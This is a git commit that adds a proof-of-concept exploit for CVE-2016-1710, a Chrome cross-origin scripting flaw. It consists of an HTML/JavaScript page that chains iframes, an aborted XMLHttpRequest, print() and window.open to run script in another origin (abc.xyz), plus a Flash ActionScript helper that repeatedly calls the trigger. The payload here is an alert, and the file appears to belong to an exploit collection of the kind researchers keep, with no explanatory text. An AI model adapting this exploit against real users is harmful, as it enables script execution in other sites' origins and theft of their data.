feat(chrome): add CVE-2016-1710

Author: Metnew

chrome/CVE-2016-1710/exploit.html

@@ -0,0 +1,55 @@
+<div style="position:fixed;top:0;left:0;height:100%;width:100%;"></div>
+<p></p>
+<script>
+  // https://bugs.chromium.org/p/chromium/issues/detail?id=616907
+
+  if (location.protocol == 'file:' || !navigator.plugins.namedItem('Shockwave Flash')) {
+    throw alert('HTTP server and Flash are required.');
+  }
+
+  var i;
+  var cached = 0;
+  var spin = 0;
+  function f() {
+    if (cached) {
+      cached = 0;
+      document.querySelector('p').innerHTML = '<b>Click anywhere to start.</b>';
+      onclick = go;
+    }
+
+    if (spin) {
+      spin = 0;
+      var w = window.open('');
+      i.src = 'https://abc.xyz';
+      w.document.documentElement.appendChild(i);
+    }
+
+    if (i) {
+      try { i.contentDocument; } catch (e) {
+        var a = document.createElement('a');
+        a.href = 'about:blank';
+        a.click();
+      }
+    }
+  }
+
+  function go() {
+    onclick = null;
+    i = document.createElement('iframe');
+    i.src = 'about:blank#';
+    document.documentElement.appendChild(i);
+    var a = i.contentDocument.createElement('a');
+    a.href = 'data:text/html,';
+    a.click();
+    var x = new i.contentWindow.XMLHttpRequest;
+    x.onabort = function () {
+      spin = 1;
+      print();
+    }
+    x.open('get', location.href, true);
+    x.send();
+    i.src = 'javascript:alert(location)';
+  }
+</script>
+<object data="s.swf"></object>
+<iframe src="https://abc.xyz" onload="cached=1"></iframe>

chrome/CVE-2016-1710/s.as

@@ -0,0 +1,10 @@
+package {
+  import flash.display.*;
+  import flash.external.*;
+  import flash.utils.*;
+  public class s extends Sprite {
+    public function s():void {
+      setInterval(ExternalInterface.call, 1, 'f');
+    }
+  }
+}